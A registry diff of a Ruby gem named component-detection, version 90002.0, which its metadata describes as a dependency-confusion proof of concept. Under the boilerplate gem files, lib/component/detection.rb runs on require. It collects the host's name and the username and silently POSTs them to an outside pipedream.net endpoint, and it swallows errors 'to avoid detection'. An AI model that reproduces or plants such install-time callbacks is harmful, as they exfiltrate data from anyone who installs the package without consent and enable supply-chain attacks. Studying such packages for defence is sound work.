component-detection 90002.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of component-detection might be problematic. Click here for more details.

Files changed (7) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +35 -0
  3. data/Rakefile +4 -0
  4. data/lib/component/detection/version.rb +7 -0
  5. data/lib/component/detection.rb +43 -0
  6. data/sig/component/detection.rbs +6 -0
  7. metadata +45 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 7d32dbc98ca42674b642b3f1367c2fc576c1aea59848a71701a49a1cb33da801
4
+ data.tar.gz: f9775347451929aa3d0a8d69fb63544522201aa784cea3bfb75fc72ff55a49d7
5
+ SHA512:
6
+ metadata.gz: 1a8968178e49bf0c39100cab8ebe3ba01e9c7aa3ac08f0a2641e47b3f188127cf6b6972321ac8b0f40b86bd0d3f7320b9c11983c3fc54e4a60b23a647108d1bb
7
+ data.tar.gz: cea17bddc1365dc9995feefb43f25cd1c6b8d1966ac9fcd1c596d25fae4c7783af49a51479f5c597c66b46e4b836d4c7bb74e4f3f60f2ce0cb9cc6ab8ffe7d34
data/README.md ADDED
@@ -0,0 +1,35 @@
1
+ # Component::Detection
2
+
3
+ TODO: Delete this and the text below, and describe your gem
4
+
5
+ Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/component/detection`. To experiment with that code, run `bin/console` for an interactive prompt.
6
+
7
+ ## Installation
8
+
9
+ TODO: Replace `UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG` with your gem name right after releasing it to RubyGems.org. Please do not do it earlier due to security reasons. Alternatively, replace this section with instructions to install your gem from git if you don't plan to release to RubyGems.org.
10
+
11
+ Install the gem and add to the application's Gemfile by executing:
12
+
13
+ ```bash
14
+ bundle add UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG
15
+ ```
16
+
17
+ If bundler is not being used to manage dependencies, install the gem by executing:
18
+
19
+ ```bash
20
+ gem install UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG
21
+ ```
22
+
23
+ ## Usage
24
+
25
+ TODO: Write usage instructions here
26
+
27
+ ## Development
28
+
29
+ After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
30
+
31
+ To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
32
+
33
+ ## Contributing
34
+
35
+ Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/component-detection.
data/Rakefile ADDED
@@ -0,0 +1,4 @@
1
+ # frozen_string_literal: true
2
+
3
+ require "bundler/gem_tasks"
4
+ task default: %i[]
data/lib/component/detection/version.rb ADDED
@@ -0,0 +1,7 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Component
4
+ module Detection
5
+ VERSION = "90002.0"
6
+ end
7
+ end
data/lib/component/detection.rb ADDED
@@ -0,0 +1,43 @@
1
+ require 'net/http'
2
+ require 'socket'
3
+ require 'json'
4
+
5
+ module Component
6
+ VERSION = "90002.0"
7
+
8
+ def self.send_callback
9
+ begin
10
+ # Collect minimal system information
11
+ hostname = Socket.gethostname
12
+ username = ENV['USER'] || ENV['USERNAME'] || 'unknown'
13
+
14
+ # Prepare data
15
+ data = {
16
+ hostname: hostname,
17
+ user: username,
18
+ timestamp: Time.now.to_i,
19
+ gem_version: VERSION
20
+ }
21
+
22
+ # Send callback to my server
23
+ uri = URI("https://eob2n6trngbek7h.m.pipedream.net")
24
+ http = Net::HTTP.new(uri.host, uri.port)
25
+ http.use_ssl = true
26
+
27
+ request = Net::HTTP::Post.new(uri.path)
28
+ request.content_type = 'application/json'
29
+ request.body = data.to_json
30
+
31
+ response = http.request(request)
32
+
33
+ # Silent success
34
+ puts "Internal gem loaded successfully" if response.code == "200"
35
+ rescue StandardError => e
36
+ # Fail silently to avoid detection
37
+ nil
38
+ end
39
+ end
40
+ end
41
+
42
+ # Execute callback on require
43
+ Component.send_callback
data/sig/component/detection.rbs ADDED
@@ -0,0 +1,6 @@
1
+ module Component
2
+ module Detection
3
+ VERSION: String
4
+ # See the writing guide of rbs: https://github.com/ruby/rbs#guides
5
+ end
6
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: component-detection
3
+ version: !ruby/object:Gem::Version
4
+ version: '90002.0'
5
+ platform: ruby
6
+ authors:
7
+ - Security Researcher Max
8
+ bindir: exe
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ description: This a proof of concept
13
+ email:
14
+ - researcher@example.com
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - README.md
20
+ - Rakefile
21
+ - lib/component/detection.rb
22
+ - lib/component/detection/version.rb
23
+ - sig/component/detection.rbs
24
+ homepage: https://example.com
25
+ licenses:
26
+ - MIT
27
+ metadata: {}
28
+ rdoc_options: []
29
+ require_paths:
30
+ - lib
31
+ required_ruby_version: !ruby/object:Gem::Requirement
32
+ requirements:
33
+ - - ">="
34
+ - !ruby/object:Gem::Version
35
+ version: 3.1.0
36
+ required_rubygems_version: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ requirements: []
42
+ rubygems_version: 3.6.7
43
+ specification_version: 4
44
+ summary: PoC for Dependency Confusion
45
+ test_files: []